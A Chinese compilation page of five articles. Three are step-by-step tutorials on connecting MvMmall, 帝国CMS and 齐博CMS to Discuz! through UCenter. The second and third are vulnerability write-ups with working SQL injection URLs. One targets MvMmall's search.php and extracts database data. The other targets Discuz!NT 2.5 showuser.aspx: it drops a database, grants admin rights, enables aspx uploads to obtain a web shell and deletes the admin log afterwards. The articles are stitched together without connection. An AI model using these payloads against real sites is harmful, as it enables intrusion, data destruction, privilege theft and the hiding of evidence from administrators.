下面小编给大家整理的MvMmall商城系统整合Discuz!X2.5教程,本文共5篇,希望大家喜欢!本文原稿由网友“说话请过脑”提供。
篇1:MvMmall商城系统整合Discuz!X2.5教程
SNS是自去年以来火得不能再火的话题,商城拥有自己的论坛是做好推广、导入流量的必需品,MvMmall多用户商城系统支持与Discuz!X2.5无缝整合,支持一次注册,同步登录,会员数据无缝对接,支持商城与论坛积分同步兑换。
MvMmall多用户商城系统,是各大区域性社区门户网站建设商城的首选系统。同时,Discuz!X2.5也是各大商城运营商的流量导入利器!
第一步:安装MvMmall多用户商城系统V3.0,安装方法详见安装手册
第二步:安装Discuz!X2.5,安装方法详见康盛软件相关说明。
温馨提示1:MvMmall提供整合技术,并不代表各位可以去除康盛的版权,请尊重创作者!
温馨提示2:在安装MvMmall多用户商城系统和Discuz!X时,网站超级管理员请务必不能重名!
第三步:进入Discuz!X2.5后台,单击头部导航栏右上角“UCenter”按钮,单击“UCenter”菜单页面左侧“应用管理”选项,再次单击“添加新应用”按钮,并填写相应的信息
温馨提示3:\"应用的主URL”请填写您所整合的商城域名,因在本地完成并截图写作本教程,所以直接填写的是IP地址
第四步:添加完应用,选择“开启同步登录”及“接受通知”选项,提交
第五步:提交完成后,复制UCenter配置信息代码
第六步:进入商城后台,会员管理》会员整合》UCenter配置 页面,将上一条中复制的代码粘贴于此
第七步:单击“提交”按钮,程序自动引导至商城设置页面,开启“整合UCenter”选项,并请务必选择正确的UCenter编码(请检查下载的Discuz!X版本),并提交
第八步:返回 会员管理》会员整合》UCenter配置 页面,单击“进行会员整合”按钮,将商城与Discuz!X整合前的会员数据进行同步,
温馨提示4:整合完成后,请务必进入Discuz!X后台,单击头部导航“工具”栏页面并清空缓存。
温馨提示5:无论是MvMmall多用户商城还是Discuz!X的会员,首次登录对方网页时,需先根据界面提示激活账号。
温馨提示6:如您的商城未开启二级域名,未进行论坛整合,商城主站后台“商铺设置/商家设置”中“URL配置1”与“URL配置2”请务必留空。
至此,MvMmall多用户商城系统与Discuz!X全部整合完成,您可以开始推广运营啦!
篇2:mvmmall网店商城系统注入漏洞漏洞预警
mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上,
代码如下:
require_once ‘include/common.inc.php’;
require_once ROOTPATH.’header.php’;
if($action!=’search’){
$search_key = ”;
if (isset($ps_search))
{ //省略一堆东西
$tag_ids = array; //在if里
//继续省略
while ($row = $db->fetch_array($result)) {
$tag_ids[] = $row['goods_id'];
} //也是在if里
}
//省略一堆东西
} //结束if里的东西
//商品标签搜索
$tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入
$tag_search = implode(‘,’,dhtmlchars($tag_ids)); //dhtmlchars过滤HTML标签不用理会
$tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了!
//省略无关东西
$search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的….
$total_count = $db->counter($mvm_goods_table,$search_sql);
用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了,
测试EXP:
www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
BY:www.dj4now.com/
篇3:Discuz!NT 2.5重大漏洞服务器教程
正在使用Discuz!NT 2.5或刚升级到Discuz!NT 2.5论坛版本的用户需要关注一下本文的内容,及时到 寻找解决方法.
漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net平台的社区软件,基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。
Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。
漏洞厂商:www.comsenz.com
漏洞解析:在 Discuz!NT 2.5(0826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞,
漏洞测试:
www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;C
www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=’1′,groupid=’1′ where username=’webtets’;C//更新为管理员
www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’aspx’ where extension=’jpg’;C //更新为aspx可上传
得到SHELL后…
www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’jpg’ where extension=’aspx’;C //更新回JPG
www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username=’webtets’;C //删除日志
www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid=”,groupid=” where username=’webtets’;C//取消管理员
篇4:帝国CMS整合Discuz通行证接口教程
帝国CMS整合Discuz有两种方式,可以用Ucenter接口整合,也可以用Discuz通行证接口+万能会员接口整合,
之前介绍了用Ucenter接口整合帝国CMS和Discuz论坛,现在看如何用Discuz通行证接口整合。
第 1 步:安装帝国CMS万能会员接口
(1)、将万能会员接口包里的“update”目录上传至帝国CMS的“e”目录里(包含update目录本身)。
万能会员接口的update文件夹复制到帝国CMS的“e”目录
(2)、执行/e/update/index.php文件,进入接口设置界面设置参数:
设置万能接口设置参数
篇5:齐博CMS V7整合Discuz X2.5教程
因为在帮客户制作一个网站,需要用齐博CMS与DISCUZ X进行整合,在查看齐博CMS后台的提示以及查找论坛的相关资料的时候,发现这些操作让人无所适从,也就是信息过时了,所以,现在有必要来更新一下这个教程:
齐博CMS V7 整合 DISCUZ X2.5
测试环境:
WIN7 Wampserver5
Apache版本:2.2.6
PHP版本:5.2.5
MYSQL版本:5.0.45-community-nt(高版本)
Zend Optimizer版本:v3.3.3
齐博CMS:V7.0Final GBK (20120609下载)
DISCUZ X:Discuz!X2.5 GBK
系统安装:
1、安装齐博CMS V7系统(安装时选择的独立安装,不选择整合其他外部系统)
2、在齐博CMS程序根目录下新建bbs/目录;
将DISCUZ X2.5程序文件复制到bbs/目录中,安装DISCUZ X,安装时数表库与齐博CMS同一数据库,表前缀等为默认;
安装DISCUZ时管理员用户与密码与安装齐博CMS V7系统一样(必须一样,不然不能同步登录退出)。
系统整合:
3、进入DISCUZ论坛管理中心-UCenter设置-应用管理-选择添加应用:
选择安装方式: 自定义安装
应用类型选择:其他;
应用名称输入:齐博整站系统;(可自定义)
应用的主 URL:你的V7整站访问地址/do ;(特别注意/do 后面没有“/”)
应用的其他 URL:为空;
应用 IP:为空;
通信密钥:为空;
应用的物理路径:为空;
查看个人资料页面地址:为空;
应用接口文件名称:uc.php ; (默认)
标签单条显示模板:为空;
标签模板标记说明:为空;
是否开启同步登录:是;
是否接受通知:是;
提交
4、进入齐博整站CMS安装目录找到 data/config.php 文件,复制一份,
(如果后面整合操作失败,整站不能打开,用复制文件进行覆盖一下,然后再次检查整合步骤。)
5、点击应用管理,此时博整站系统通信情况是失败,点击后面详情-编辑:
记住ID值:2;(无其他情况应该是2)
复制通信密钥:(程序自动生成的一串代码)
(不要关闭掉这个页面)
6、进入齐博整站CMS系统--系统功能--整合外部系统:
整合其他系统:选择 整合UCenter
密钥:填上上面第4步从UCenter应用管理中复制过的通信密钥
(不要提交信息、也不要关闭此页面)
7、再次查看UCenter应用管理-编辑齐博应用系统应用:
复制 应用的 UCenter 配置信息 中的代码
8、再次回到齐博整站CMS系统--系统功能--整合外部系统:
将第6步复制的代码替换掉 UCenter 配置信息 中的代码 ;
DISCUZ论坛贴子调用设置:数据表前缀 pre_ (默认安装如此)
其他暂时不设置;
点击保存设置。
8、再次回到UCenter应用管理,齐博整站系统通信情况为通信成功。
完成测试:
9、关闭浏览器,再打开整站和论坛,测试同步登录退出等,成功。
Discuz!应用教程:如何在7.2版本中开启使用Html、主题分类、分类信息
